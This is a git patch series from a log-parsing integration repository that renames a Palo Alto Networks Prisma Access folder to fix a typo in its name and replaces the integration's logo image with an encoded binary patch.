 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/userid_cef.json (100%)
 rename Palo Alto Networks/{paloalto-prima-access => paloalto-prisma-access}/tests/wildfire1_json.json (100%)

diff --git a/Palo Alto Networks/paloalto-prima-access/CHANGELOG.md b/Palo Alto Networks/paloalto-prisma-access/CHANGELOG.md
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/CHANGELOG.md
rename to Palo Alto Networks/paloalto-prisma-access/CHANGELOG.md
diff --git a/Palo Alto Networks/paloalto-prima-access/README.md b/Palo Alto Networks/paloalto-prisma-access/README.md
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/README.md
rename to Palo Alto Networks/paloalto-prisma-access/README.md
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/fields.yml
rename to Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/logo.png b/Palo Alto Networks/paloalto-prisma-access/_meta/logo.png
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/logo.png
rename to Palo Alto Networks/paloalto-prisma-access/_meta/logo.png
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/manifest.yml
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/manifest.yml
rename to Palo Alto Networks/paloalto-prisma-access/_meta/manifest.yml
diff --git a/Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json b/Palo Alto Networks/paloalto-prisma-access/_meta/smart-descriptions.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/_meta/smart-descriptions.json
rename to Palo Alto Networks/paloalto-prisma-access/_meta/smart-descriptions.json
diff --git a/Palo Alto Networks/paloalto-prima-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/ingest/parser.yml
rename to Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/User_id_1_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/User_id_1_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/User_id_1_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/User_id_2_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/User_id_2_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/User_id_2_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/auth_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/auth_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/auth_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/decryption_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/decryption_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/file_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/file_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/file_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/file_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/fix_bug_with_int.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_with_int.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_without_int.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/fix_bug_without_int.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/fix_bug_without_int.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/globalprotect_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/globalprotect_csv_2.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/globalprotect_csv_2.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/hip_match_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/hip_match_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/hip_match_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/icmp_allow_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/icmp_allow_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/icmp_allow_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/iptag_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/iptag_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/iptag_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_1.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_1.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_1.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_2.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/network_threat_alert_2.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/network_threat_alert_2.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/sctp_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/sctp_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/sctp_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/system_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/system_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/system_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/system_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/tcp_allow_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/tcp_allow_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/tcp_allow_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_cloud_election_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_cloud_election_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_cloud_election_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_dhcp_renew_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_dhcp_renew_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_dhcp_renew_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_dns_proxy_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_dns_proxy_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_dns_proxy_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_dns_response.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_dns_response.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_dns_response.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_file_alert_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_file_alert_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_file_alert_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_globalprotect.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_globalprotect.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_installed_package_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_installed_package_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_installed_package_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_ldap_brute_force.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_ldap_brute_force.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_ldap_brute_force.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_file_type.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_file_type.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_file_type.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_globalprotect.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_globalprotect.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_threat_type.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_threat_type.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_threat_type.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_new_url_type.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_new_url_type.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_new_url_type.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_ntp_sync_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_ntp_sync_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_ntp_sync_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_port_up_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_port_up_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_port_up_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_registration_succeed_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_registration_succeed_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_registration_succeed_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_10_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_10_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_10_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_11_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_11_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_11_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_12_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_12_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_12_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_1_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_1_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_1_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_2_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_2_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_2_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_3_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_3_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_3_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_4_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_4_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_4_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_5_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_5_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_5_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_6_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_6_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_6_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_7_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_7_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_8_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_8_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_9_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_system_event_9_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_threat.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_threat.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_threat.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_threat_02.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_threat_02.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_timestamp_palo.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_timestamp_palo.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_1_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_1_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_2_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_traffic_event_2_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_update_content_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_update_content_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_update_content_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_upgrade_package_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_upgrade_package_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_upgrade_package_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_user_authentication_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_user_authentication_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_user_authentication_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_userid.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_userid.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_userid.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_web_authentication_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_web_authentication_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_web_authentication_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_wildfire_failure_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/test_wildfire_failure_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/test_wildfire_failure_json.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json b/Palo Alto Networks/paloalto-prisma-access/tests/threat-url-xff.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/threat-url-xff.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/threat-url-xff.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/threat_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/threat_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/threat_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/threat_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/threat_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/threat_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic1_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic1_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic1_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic2_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic2_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic2_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json b/Palo Alto Networks/paloalto-prisma-access/tests/traffic_with_resotimestamp.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/traffic_with_resotimestamp.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/traffic_with_resotimestamp.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/udp_deny_csv.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/udp_deny_csv.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/udp_deny_csv.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/url_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/url_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/url_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/url_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json b/Palo Alto Networks/paloalto-prisma-access/tests/userid_cef.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/userid_cef.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/userid_cef.json
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/wildfire1_json.json
similarity index 100%
rename from Palo Alto Networks/paloalto-prima-access/tests/wildfire1_json.json
rename to Palo Alto Networks/paloalto-prisma-access/tests/wildfire1_json.json

From 59aa04e0546762f062fd47c7c7d6b3f55de5cc43 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Wed, 16 Oct 2024 16:50:15 +0200
Subject: [PATCH 155/317] fix(PaloAlto): fix prisma access logo

---
 .../paloalto-prisma-access/_meta/logo.png     | Bin 13410 -> 8994 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)

diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/logo.png b/Palo Alto Networks/paloalto-prisma-access/_meta/logo.png
index 344ec7ecd5bb31a7e641101881f5767a5ecb4a1a..1a8d0ff1f238f359de5f0eb7929e740a444baecf 100644
GIT binary patch
literal 8994
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
